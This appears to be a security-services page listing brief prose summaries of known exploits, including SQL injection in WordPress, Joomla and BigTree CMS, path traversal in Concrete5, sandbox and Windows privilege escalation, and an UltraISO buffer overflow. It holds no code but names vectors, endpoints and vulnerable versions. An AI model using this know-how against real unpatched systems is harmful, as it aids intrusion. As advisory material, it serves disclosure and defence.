The vulnerability exists because the path for the incoming request is retrieved using the "Request::getPathInfo()" method from the Symfony framework, which allows to specify the path for the request within some HTTP headers (like "X-Original-URL" and some others). So, it might be possible to specify paths containing "dot-dot-slash" sequences without worrying about URL encoding and path normalization done by the web server. This could be exploited by unauthenticated attackers to include arbitrary .php files located outside the Concrete5 root directory or from the Concrete5 codebase itself (potentially leading to unauthorized access to certain functionalities) by sending an HTTP request.
This exploit allows an attacker to spawn a calc.exe process with Administrator privileges on Cuckoo Sandbox versions <= 2.0.1. The exploit assumes that the Cuckoo agent.py is running with Admin privileges and the current user can access a local interface. Additionally, for true Remote Code Execution, external equipment must be able to access the XMLRPC port (default 8000). The exploit can be used to trick the detection system, potentially escape the sandbox machine, or attack sensitive systems.
This exploit allows an attacker to perform blind SQL injection and bypass payment authentication in the Ultimate Membership Pro WordPress Plugin. The vulnerability allows the attacker to execute arbitrary SQL queries and bypass payment authentication without proper authentication.
The exploit takes advantage of a vulnerability in the Inout Search Engine. It allows an attacker to execute arbitrary code on the target server by injecting malicious code into the engine name.
This exploit allows an attacker to elevate their privileges on a Windows 7 SP1 x86 system. It takes advantage of a vulnerability in the HaliSystemQueryInformation function, which is not properly replaced, leading to a Blue Screen of Death (BSOD) at some point. The exploit spawns CMD.exe with SYSTEM rights.
The Symantec Antivirus scan engine's Decomposer component, responsible for unpacking various archive formats, is based on an outdated version (4.1.4) of the open-source unrar package. This version has multiple critical memory corruption bugs that have been resolved in the current version (5.3.11). Publicly known vulnerabilities can result in remote code execution as NT AUTHORITYSYSTEM on Windows and root on Linux and Mac. This vulnerability affects Norton Antivirus, Symantec Endpoint Protection, and Symantec Scan Engine, as well as other Symantec products using the core Symantec scan engine.
This exploit allows an attacker to retrieve the admin username and MD5 hash using a SQL injection vulnerability in the Joomla Component Phil-a-Form version 1.2.0.0 or lower.
The Riverbed SteelCentral NetProfiler and NetExpress virtual appliances are affected by multiple security vulnerabilities, including authentication bypass, SQL injection, arbitrary code execution, privilege escalation, local file inclusion, account hijacking, and hardcoded default credentials. Details for other low severity vulnerabilities are available in the accompanying PDF. The SQL injection vulnerability allows an attacker to add a user account in the application's PostgreSQL database and bypass authentication. The exploitation of this vulnerability can be replicated from the main web GUI login functionality.
The submitPageChange function in BigTree CMS <= 4.2.11 is vulnerable to SQL Injection. The function is used twice during development in the following locations: /core/admin/modules/pages/front-end-update.php and /core/admin/modules/pages/update.php. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the /site/index.php/admin/pages/update/ endpoint. The vulnerability allows an authenticated attacker to execute arbitrary SQL queries.
The exploit allows an attacker to execute arbitrary code by creating a malicious CUE file that triggers a buffer overflow vulnerability in Ultra ISO. This can be used to run arbitrary shellcode, such as the Metasploit calc.exe shellcode used in this example.
Services By CQR